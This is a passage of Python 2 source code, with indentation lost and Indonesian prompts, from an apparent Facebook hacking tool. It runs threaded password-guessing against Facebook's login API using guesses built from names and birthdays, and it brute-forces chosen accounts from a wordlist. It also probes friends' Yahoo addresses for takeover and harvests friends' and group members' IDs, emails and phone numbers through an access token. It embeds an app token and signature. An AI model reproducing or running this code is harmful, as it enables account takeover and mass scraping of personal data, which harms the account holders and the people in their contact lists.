idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
